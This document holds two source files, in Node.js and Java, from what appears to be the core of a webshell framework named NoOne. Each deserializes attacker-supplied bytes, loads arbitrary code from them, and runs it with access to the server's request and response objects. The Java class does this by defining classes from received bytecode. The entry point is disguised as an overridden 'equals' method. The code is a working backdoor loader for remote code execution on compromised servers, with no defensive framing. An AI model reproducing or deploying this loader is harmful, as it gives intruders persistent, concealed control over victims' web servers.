File: noone-core/nodejs-core/NoOneCore.mjs
(function() {
    const ACTION = "action";
    const PLUGIN = "plugin";
    const CLASS_BYTES = "pluginCode";
    const VERSION = "version";
    const ARGS = "args";

    const REFRESH = "refresh";
    const PLUGIN_CACHES = "pluginCaches";
    const GLOBAL_CACHES = "globalCaches";

    const ACTION_STATUS = "status";
    const ACTION_RUN = "run";
    const ACTION_LOAD = "load";
    const ACTION_CLEAN = "clean";

    const CODE = "code";
    const ERROR = "error";
    const DATA = "data";
    const SUCCESS = 0;
    const FAILURE = 1;

    const NULL = 0x00;
    const STRING = 0x01;
    const INTEGER = 0x02;
    const LONG = 0x03;
    const DOUBLE = 0x04;
    const BOOLEAN = 0x05;
    const BYTE_ARRAY = 0x06;
    const LIST = 0x07;
    const OBJECT_ARRAY = 0x08;
    const SET = 0x09;
    const MAP = 0x10;

    const loadedPluginCache = new Map();
    const loadedPluginVersionCache = new Map();
    const globalCaches = new Map();

    function serialize(obj) {
        const writer = createWriter();
        writeMap(writer, obj);
        return writer.toBuffer();
    }

    function deserialize(buffer) {
        const reader = createReader(buffer);
        const type = reader.readByte();
        if (type !== MAP) {
            throw new Error("Root object is not a Map.");
        }
        return readMap(reader);
    }

    function createWriter() {
        const chunks = [];
        return {
            writeByte(value) {
                const buf = Buffer.allocUnsafe(1);
                buf.writeInt8(value, 0);
                chunks.push(buf);
            },
            writeBoolean(value) {
                this.writeByte(value ? 1 : 0);
            },
            writeInt(value) {
                const buf = Buffer.allocUnsafe(4);
                buf.writeInt32BE(value, 0);
                chunks.push(buf);
            },
            writeLong(value) {
                const normalized = typeof value === "bigint"
                    ? value
                    : BigInt(Math.trunc(Number(value)));
                const buf = Buffer.allocUnsafe(8);
                buf.writeBigInt64BE(normalized, 0);
                chunks.push(buf);
            },
            writeDouble(value) {
                const buf = Buffer.allocUnsafe(8);
                buf.writeDoubleBE(value, 0);
                chunks.push(buf);
            },
            writeRaw(value) {
                chunks.push(Buffer.from(value));
            },
            writeUTF(value) {
                const utfBytes = encodeModifiedUtf8(String(value));
                if (utfBytes.length > 0xffff) {
                    throw new Error("Encoded string too long for modified UTF-8.");
                }
                const len = Buffer.allocUnsafe(2);
                len.writeUInt16BE(utfBytes.length, 0);
                chunks.push(len, utfBytes);
            },
            toBuffer() {
                return Buffer.concat(chunks);
            }
        };
    }

    function createReader(input) {
        const buffer = Buffer.from(input);
        let offset = 0;

        function requireLength(length) {
            if (offset + length > buffer.length) {
                throw new Error("Unexpected end of buffer.");
            }
        }

        return {
            readByte() {
                requireLength(1);
                const value = buffer.readInt8(offset);
                offset += 1;
                return value;
            },
            readBoolean() {
                return this.readByte() !== 0;
            },
            readInt() {
                requireLength(4);
                const value = buffer.readInt32BE(offset);
                offset += 4;
                return value;
            },
            readLong() {
                requireLength(8);
                const value = buffer.readBigInt64BE(offset);
                offset += 8;
                return Number(value);
            },
            readDouble() {
                requireLength(8);
                const value = buffer.readDoubleBE(offset);
                offset += 8;
                return value;
            },
            readRaw(length) {
                if (length < 0) {
                    throw new Error("Negative length found in stream.");
                }
                requireLength(length);
                const value = Buffer.from(buffer.subarray(offset, offset + length));
                offset += length;
                return value;
            },
            readUTF() {
                requireLength(2);
                const length = buffer.readUInt16BE(offset);
                offset += 2;
                const bytes = this.readRaw(length);
                return decodeModifiedUtf8(bytes);
            }
        };
    }

    function writeMap(writer, map) {
        writer.writeByte(MAP);
        if (map == null) {
            writer.writeInt(0);
            return;
        }
        const entries = toMapEntries(map);
        writer.writeInt(entries.length);
        for (const [key, value] of entries) {
            writer.writeUTF(String(key));
            writeObject(writer, value);
        }
    }

    function writeObject(writer, obj) {
        if (obj == null) {
            writer.writeByte(NULL);
            return;
        }
        if (typeof obj === "string") {
            writer.writeByte(STRING);
            writer.writeUTF(obj);
            return;
        }
        if (typeof obj === "number") {
            if (Number.isInteger(obj) && obj >= -2147483648 && obj <= 2147483647) {
                writer.writeByte(INTEGER);
                writer.writeInt(obj);
            } else if (Number.isInteger(obj)) {
                writer.writeByte(LONG);
                writer.writeLong(obj);
            } else {
                writer.writeByte(DOUBLE);
                writer.writeDouble(obj);
            }
            return;
        }
        if (typeof obj === "bigint") {
            writer.writeByte(LONG);
            writer.writeLong(obj);
            return;
        }
        if (typeof obj === "boolean") {
            writer.writeByte(BOOLEAN);
            writer.writeBoolean(obj);
            return;
        }
        if (Buffer.isBuffer(obj) || obj instanceof Uint8Array) {
            const bytes = Buffer.from(obj);
            writer.writeByte(BYTE_ARRAY);
            writer.writeInt(bytes.length);
            writer.writeRaw(bytes);
            return;
        }
        if (obj instanceof Set) {
            writer.writeByte(SET);
            writer.writeInt(obj.size);
            for (const item of obj) {
                writeObject(writer, item);
            }
            return;
        }
        if (Array.isArray(obj)) {
            writer.writeByte(LIST);
            writer.writeInt(obj.length);
            for (const item of obj) {
                writeObject(writer, item);
            }
            return;
        }
        if (obj instanceof Map || isPlainObject(obj)) {
            writeMap(writer, obj);
            return;
        }
        throw new Error(`Unsupported type for serialization: ${obj.constructor?.name ?? typeof obj}`);
    }

    function readMap(reader) {
        const size = reader.readInt();
        if (size < 0) {
            throw new Error(`Negative map size found in stream: ${size}`);
        }
        const map = {};
        for (let i = 0; i < size; i++) {
            const key = reader.readUTF();
            map[key] = readObject(reader);
        }
        return map;
    }

    function readObject(reader) {
        const type = reader.readByte();
        switch (type) {
            case NULL:
                return null;
            case STRING:
                return reader.readUTF();
            case INTEGER:
                return reader.readInt();
            case LONG:
                return reader.readLong();
            case DOUBLE:
                return reader.readDouble();
            case BOOLEAN:
                return reader.readBoolean();
            case BYTE_ARRAY: {
                const len = reader.readInt();
                return reader.readRaw(len);
            }
            case SET: {
                const size = reader.readInt();
                if (size < 0) {
                    throw new Error(`Negative set size found in stream: ${size}`);
                }
                const set = new Set();
                for (let i = 0; i < size; i++) {
                    set.add(readObject(reader));
                }
                return set;
            }
            case LIST:
            case OBJECT_ARRAY: {
                const size = reader.readInt();
                if (size < 0) {
                    throw new Error(`Negative array size found in stream: ${size}`);
                }
                const list = new Array(size);
                for (let i = 0; i < size; i++) {
                    list[i] = readObject(reader);
                }
                return list;
            }
            case MAP:
                return readMap(reader);
            default:
                throw new Error(`Unknown data type found in stream: ${type}`);
        }
    }

    function toMapEntries(value) {
        if (value instanceof Map) {
            return Array.from(value.entries());
        }
        if (isPlainObject(value)) {
            return Object.entries(value);
        }
        throw new Error(`Unsupported map type: ${value?.constructor?.name ?? typeof value}`);
    }

    function isPlainObject(value) {
        return value != null
            && typeof value === "object"
            && !Array.isArray(value)
            && !Buffer.isBuffer(value)
            && !(value instanceof Uint8Array)
            && !(value instanceof Map)
            && !(value instanceof Set);
    }

    function encodeModifiedUtf8(value) {
        const bytes = [];
        for (let i = 0; i < value.length; i++) {
            const c = value.charCodeAt(i);
            if (c >= 0x0001 && c <= 0x007f) {
                bytes.push(c);
            } else if (c <= 0x07ff) {
                bytes.push(0xc0 | ((c >> 6) & 0x1f));
                bytes.push(0x80 | (c & 0x3f));
            } else {
                bytes.push(0xe0 | ((c >> 12) & 0x0f));
                bytes.push(0x80 | ((c >> 6) & 0x3f));
                bytes.push(0x80 | (c & 0x3f));
            }
        }
        return Buffer.from(bytes);
    }

    function decodeModifiedUtf8(buffer) {
        let out = "";
        let i = 0;
        while (i < buffer.length) {
            const b1 = buffer[i++] & 0xff;
            if ((b1 & 0x80) === 0) {
                if (b1 === 0) {
                    throw new Error("Invalid modified UTF-8 byte 0x00.");
                }
                out += String.fromCharCode(b1);
                continue;
            }
            if ((b1 & 0xe0) === 0xc0) {
                if (i >= buffer.length) {
                    throw new Error("Malformed modified UTF-8 sequence.");
                }
                const b2 = buffer[i++] & 0xff;
                if ((b2 & 0xc0) !== 0x80) {
                    throw new Error("Malformed modified UTF-8 continuation byte.");
                }
                const c = ((b1 & 0x1f) << 6) | (b2 & 0x3f);
                out += String.fromCharCode(c);
                continue;
            }
            if ((b1 & 0xf0) === 0xe0) {
                if (i + 1 >= buffer.length) {
                    throw new Error("Malformed modified UTF-8 sequence.");
                }
                const b2 = buffer[i++] & 0xff;
                const b3 = buffer[i++] & 0xff;
                if ((b2 & 0xc0) !== 0x80 || (b3 & 0xc0) !== 0x80) {
                    throw new Error("Malformed modified UTF-8 continuation byte.");
                }
                const c = ((b1 & 0x0f) << 12) | ((b2 & 0x3f) << 6) | (b3 & 0x3f);
                out += String.fromCharCode(c);
                continue;
            }
            throw new Error(`Invalid modified UTF-8 leading byte: ${b1}`);
        }
        return out;
    }

    function getStatus() {
        const result = {};
        result[PLUGIN_CACHES] = Object.fromEntries(loadedPluginVersionCache);
        return result;
    }

    function load(args, result) {
        const plugin = args[PLUGIN];
        const pluginCode = args[CLASS_BYTES];
        const version = args[VERSION] == null ? null : String(args[VERSION]);
        const refresh = args[REFRESH] === true || String(args[REFRESH]).toLowerCase() === "true";
        let pluginObj = refresh ? null : loadedPluginCache.get(plugin);
        if (pluginObj == null) {
            if (plugin == null) {
                throw new Error("plugin is required");
            }
            if (pluginCode == null) {
                throw new Error("pluginCode are required for class loading");
            }

            try {
                const pluginFunc = new Function(pluginCode)();
                if (typeof pluginFunc === 'function') {
                    pluginObj = pluginFunc;
                } else {
                    pluginObj = pluginFunc;
                }
                loadedPluginCache.set(plugin, pluginObj);
                loadedPluginVersionCache.set(plugin, version);
            } catch (error) {
                console.error(error);
                throw new Error(`Failed to load class: ${error.message}\n${error.stack}`);
            }
        }
        return pluginObj;
    }

    async function run(args) {
        const plugin = args[PLUGIN];
        const pluginObj = loadedPluginCache.get(plugin);
        console.log("pluginObj: " + pluginObj);
        let map = args[ARGS];
        if (map == null) {
            map = {};
        }
        map[PLUGIN_CACHES] = Object.fromEntries(loadedPluginCache);
        map[GLOBAL_CACHES] = Object.fromEntries(globalCaches);
        await pluginObj.equals(map);
        console.log("plugin result: ", map.result);
        const result = {};
        result[DATA] = map.result;
        return result;
    }

    async function equals(inputBytes) {
        const result = {};
        result[CODE] = SUCCESS;

        let args = {};
        try {
            args = deserialize(inputBytes);
        } catch (e) {
            result[CODE] = FAILURE;
            result[ERROR] = `args parsed failed: ${e.message}\n${e.stack}`;
            return serialize(result);
        }
        const action = args[ACTION];
        if (action != null) {
            try {
                switch (action) {
                    case ACTION_STATUS:
                        Object.assign(result, getStatus());
                        break;
                    case ACTION_RUN:
                        Object.assign(result, await run(args));
                        break;
                    case ACTION_LOAD:
                        const loaded = load(args, result);
                        result[DATA] = loaded != null;
                        break;
                    case ACTION_CLEAN:
                        loadedPluginCache.clear();
                        loadedPluginVersionCache.clear();
                        globalCaches.clear();
                        result[DATA] = true;
                        break;
                    default:
                        result[CODE] = FAILURE;
                        result[ERROR] = `action [${action}] not supported`;
                        break;
                }
            } catch (e) {
                result[CODE] = FAILURE;
                result[ERROR] = `action [${action}] run failed: ${e.message}\n${e.stack}`;
            }
        } else {
            result[CODE] = FAILURE;
            result[ERROR] = "action is required";
        }

        return serialize(result);
    }

    return {
        equals,
        loadedPluginCache,
        globalCaches,
        getStatus,
        load,
        run
    };

})()

File: noone-core/src/legacy8/java/com/reajason/noone/core/NoOneCore.java
package com.reajason.noone.core;

import java.io.*;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.*;
import java.util.concurrent.ConcurrentHashMap;

/**
 * @author ReaJason
 * @since 2025/8/29
 */
public class NoOneCore extends URLClassLoader {

    private static final String ACTION = "action";
    private static final String CLASSNAME = "className";
    private static final String PLUGIN = "plugin";
    private static final String PLUGIN_BYTES = "pluginBytes";
    private static final String VERSION = "version";
    private static final String ARGS = "args";

    private static final String REFRESH = "refresh";
    private static final String CLASS_DEFINE = "classDefine";
    private static final String CLASS_RUN = "classRun";
    private static final String PLUGIN_CACHES = "pluginCaches";
    private static final String GLOBAL_CACHES = "globalCaches";

    private static final String ACTION_STATUS = "status";
    private static final String ACTION_RUN = "run";
    private static final String ACTION_LOAD = "load";
    private static final String ACTION_CLEAN = "clean";

    private static final String CODE = "code";
    private static final String ERROR = "error";
    private static final String DATA = "data";
    private static final int SUCCESS = 0;
    private static final int FAILURE = 1;

    // pluginName to pluginObject
    public static final Map<String, Object> loadedPluginCache = new ConcurrentHashMap<>();
    public static final Map<String, String> loadedPluginVersionCache = new ConcurrentHashMap<>();
    public static final Map<String, Object> globalCaches = new ConcurrentHashMap<>();

    private static volatile NoOneCore pluginClassLoader;

    public NoOneCore() {
        super(new URL[0]);
    }

    public NoOneCore(ClassLoader parent) {
        super(new URL[0], parent);
    }

    private static NoOneCore getPluginClassLoader() {
        if (pluginClassLoader == null) {
            synchronized (NoOneCore.class) {
                if (pluginClassLoader == null) {
                    pluginClassLoader = new NoOneCore(Thread.currentThread().getContextClassLoader());
                }
            }
        }
        return pluginClassLoader;
    }

    private Object req;
    private Object res;

    @Override
    public boolean equals(Object obj) {
        Object[] ctx = (Object[]) obj;
        if (!(ctx[1] instanceof OutputStream)) {
            req = ctx[0];
            res = ctx[1];
            return false;
        }
        byte[] inputBytes = (byte[]) ctx[0];
        OutputStream outputStream = (OutputStream) ctx[1];
        Map<String, Object> result = new LinkedHashMap<>();
        result.put(CODE, SUCCESS);
        Map<String, Object> args = new HashMap<>();
        try {
            args = deserialize(inputBytes);
        } catch (Throwable e) {
            result.put(CODE, FAILURE);
            result.put(ERROR, getStackTraceAsString(new RuntimeException("args parsed failed, " + e.getMessage(), e)));
        }
        String action = (String) args.get(ACTION);
        if (action != null) {
            try {
                switch (action) {
                    case ACTION_STATUS:
                        result.putAll(getStatus());
                        break;
                    case ACTION_RUN:
                        result.putAll(run(args));
                        break;
                    case ACTION_LOAD:
                        Object loaded = load(args, result);
                        result.put(DATA, loaded != null);
                        break;
                    case ACTION_CLEAN:
                        for (Object service : globalCaches.values()) {
                            try {
                                Map<String, Object> shutdownCtx = new HashMap<>();
                                shutdownCtx.put("op", "shutdown");
                                service.equals(shutdownCtx);
                            } catch (Throwable ignored) {
                            }
                        }
                        globalCaches.clear();
                        loadedPluginCache.clear();
                        loadedPluginVersionCache.clear();
                        pluginClassLoader = null;
                        break;
                    default:
                        result.put(CODE, FAILURE);
                        result.put(ERROR, "action [" + action + "] not supported");
                        break;
                }
            } catch (Throwable e) {
                result.put(CODE, FAILURE);
                result.put(ERROR, getStackTraceAsString(new RuntimeException("action [" + action + "] run failed, " + e.getMessage(), e)));
            }
        }
        try {
            byte[] bytes = serialize(result);
            outputStream.write(bytes, 0, bytes.length);
            outputStream.flush();
            outputStream.close();
        } catch (Throwable e) {
            e.printStackTrace();
        }
        return true;
    }

    private Class<?> defineClass(String className, byte[] bytes) {
        return super.defineClass(className, bytes, 0, bytes.length);
    }

    public Map<String, Object> getStatus() {
        Map<String, Object> result = new HashMap<>();
        result.put(PLUGIN_CACHES, loadedPluginVersionCache);
        result.put(GLOBAL_CACHES, globalCaches.keySet());
        return result;
    }

    public Object load(Map<String, Object> args, Map<String, Object> result) throws Exception {
        String plugin = (String) args.get(PLUGIN);
        String className = (String) args.get(CLASSNAME);
        byte[] pluginBytes = (byte[]) args.get(PLUGIN_BYTES);
        String version = asString(args.get(VERSION));
        boolean refresh = asBoolean(args.get(REFRESH));

        if (!refresh && plugin != null) {
            Object cached = loadedPluginCache.get(plugin);
            if (cached != null) {
                return cached;
            }
        }

        if (className == null || className.isEmpty()) {
            throw new RuntimeException("className is required for class loading");
        }
        if (pluginBytes == null || pluginBytes.length == 0) {
            throw new RuntimeException("pluginBytes is required for class loading");
        }

        NoOneCore loader = getPluginClassLoader();

        if (refresh) {
            Object pluginObj = loader.defineClass(className, pluginBytes)
                    .getDeclaredConstructor().newInstance();
            loadedPluginCache.put(plugin, pluginObj);
            loadedPluginVersionCache.put(plugin, version);
            result.put(CLASS_DEFINE, true);
            return pluginObj;
        }

        synchronized (loadedPluginCache) {
            Object pluginObj = loadedPluginCache.get(plugin);
            if (pluginObj == null) {
                pluginObj = loader.defineClass(className, pluginBytes)
                        .getDeclaredConstructor().newInstance();
                loadedPluginCache.put(plugin, pluginObj);
                loadedPluginVersionCache.put(plugin, version);
                result.put(CLASS_DEFINE, true);
            }
            return pluginObj;
        }
    }


    @SuppressWarnings("unchecked")
    public Map<String, Object> run(Map<String, Object> args) {
        Map<String, Object> result = new HashMap<>();
        String plugin = (String) args.get(PLUGIN);
        Object pluginObj = loadedPluginCache.get(plugin);
        if (pluginObj == null) {
            throw new RuntimeException("plugin [" + plugin + "] not found");
        }
        Map<String, Object> map = (Map<String, Object>) args.get(ARGS);
        if (map == null) {
            map = new HashMap<>();
        }
        map.put(PLUGIN_CACHES, loadedPluginCache);
        map.put(GLOBAL_CACHES, globalCaches);
        map.put("request", req);
        map.put("response", res);
        pluginObj.equals(map);
        result.put(DATA, map.get("result"));
        result.put(CLASS_RUN, true);
        return result;
    }

    public static byte[] toByteArray(InputStream input) {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        byte[] buffer = new byte[4096];
        int len;
        try {
            while ((len = input.read(buffer)) != -1) {
                baos.write(buffer, 0, len);
            }
        } catch (IOException ignored) {
        } finally {
            if (input != null) {
                try {
                    input.close();
                } catch (IOException ignored) {
                }
            }
        }
        return baos.toByteArray();
    }

    private boolean asBoolean(Object value) {
        if (value instanceof Boolean) {
            return (Boolean) value;
        }
        return Boolean.parseBoolean(asString(value));
    }

    private String asString(Object value) {
        return value == null ? null : String.valueOf(value);
    }

    static final byte NULL = 0x00;
    static final byte STRING = 0x01;
    static final byte INTEGER = 0x02;
    static final byte LONG = 0x03;
    static final byte DOUBLE = 0x04;
    static final byte BOOLEAN = 0x05;
    static final byte BYTE_ARRAY = 0x06;
    static final byte LIST = 0x7;
    static final byte OBJECT_ARRAY = 0x8;
    static final byte SET = 0x09;
    static final byte MAP = 0x10;

    public byte[] serialize(Map<String, Object> map) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        DataOutputStream dos = new DataOutputStream(baos);
        writeMap(dos, map);
        return baos.toByteArray();
    }

    public Map<String, Object> deserialize(byte[] data) throws IOException {
        ByteArrayInputStream bais = new ByteArrayInputStream(data);
        DataInputStream dis = new DataInputStream(bais);
        byte type = dis.readByte();
        if (type == MAP) {
            return readMap(dis);
        } else {
            throw new IOException("Root object is not a Map.");
        }
    }

    private void writeMap(DataOutputStream dos, Map<String, Object> map) throws IOException {
        dos.writeByte(MAP);
        if (map == null) {
            dos.writeInt(0);
            return;
        }
        dos.writeInt(map.size());
        for (Map.Entry<String, Object> entry : map.entrySet()) {
            dos.writeUTF(entry.getKey());
            writeObject(dos, entry.getValue());
        }
    }

    private void writeObject(DataOutputStream dos, Object obj) throws IOException {
        if (obj == null) {
            dos.writeByte(NULL);
        } else if (obj instanceof String) {
            dos.writeByte(STRING);
            dos.writeUTF((String) obj);
        } else if (obj instanceof Integer) {
            dos.writeByte(INTEGER);
            dos.writeInt((Integer) obj);
        } else if (obj instanceof Long) {
            dos.writeByte(LONG);
            dos.writeLong((Long) obj);
        } else if (obj instanceof Double) {
            dos.writeByte(DOUBLE);
            dos.writeDouble((Double) obj);
        } else if (obj instanceof Boolean) {
            dos.writeByte(BOOLEAN);
            dos.writeBoolean((Boolean) obj);
        } else if (obj instanceof byte[]) {
            dos.writeByte(BYTE_ARRAY);
            byte[] bytes = (byte[]) obj;
            dos.writeInt(bytes.length);
            dos.write(bytes);
        } else if (obj instanceof Set) {
            dos.writeByte(SET);
            Set<?> set = (Set<?>) obj;
            dos.writeInt(set.size());
            for (Object item : set) {
                writeObject(dos, item);
            }
        } else if (obj instanceof List) {
            dos.writeByte(LIST);
            List<?> list = (List<?>) obj;
            dos.writeInt(list.size());
            for (Object item : list) {
                writeObject(dos, item);
            }
        } else if (obj instanceof Object[]) {
            dos.writeByte(OBJECT_ARRAY);
            Object[] array = (Object[]) obj;
            dos.writeInt(array.length);
            for (Object item : array) {
                writeObject(dos, item);
            }
        } else if (obj instanceof Map) {
            @SuppressWarnings("unchecked")
            Map<String, Object> subMap = (Map<String, Object>) obj;
            writeMap(dos, subMap);
        } else {
            throw new IllegalArgumentException("Unsupported type for serialization: " + obj.getClass().getName());
        }
    }

    private Map<String, Object> readMap(DataInputStream dis) throws IOException {
        int size = dis.readInt();
        Map<String, Object> map = new HashMap<>(size);
        for (int i = 0; i < size; i++) {
            String key = dis.readUTF();
            Object value = readObject(dis);
            map.put(key, value);
        }
        return map;
    }

    private Object readObject(DataInputStream dis) throws IOException {
        byte type = dis.readByte();
        switch (type) {
            case NULL:
                return null;
            case STRING:
                return dis.readUTF();
            case INTEGER:
                return dis.readInt();
            case LONG:
                return dis.readLong();
            case DOUBLE:
                return dis.readDouble();
            case BOOLEAN:
                return dis.readBoolean();
            case BYTE_ARRAY:
                int len = dis.readInt();
                byte[] bytes = new byte[len];
                dis.readFully(bytes);
                return bytes;
            case SET:
                int setSize = dis.readInt();
                Set<Object> set = new LinkedHashSet<>(setSize);
                for (int i = 0; i < setSize; i++) {
                    set.add(readObject(dis));
                }
                return set;
            case LIST:
                int listSize = dis.readInt();
                List<Object> list = new ArrayList<>(listSize);
                for (int i = 0; i < listSize; i++) {
                    list.add(readObject(dis));
                }
                return list;
            case OBJECT_ARRAY:
                int arrayLength = dis.readInt();
                Object[] array = new Object[arrayLength];
                for (int i = 0; i < arrayLength; i++) {
                    array[i] = readObject(dis);
                }
                return array;
            case MAP:
                return readMap(dis);
            default:
                throw new IOException("Unknown data type found in stream: " + type);
        }
    }

    private String getStackTraceAsString(Throwable throwable) {
        StringWriter sw = new StringWriter();
        PrintWriter pw = new PrintWriter(sw);
        throwable.printStackTrace(pw);
        return sw.toString();
    }
}
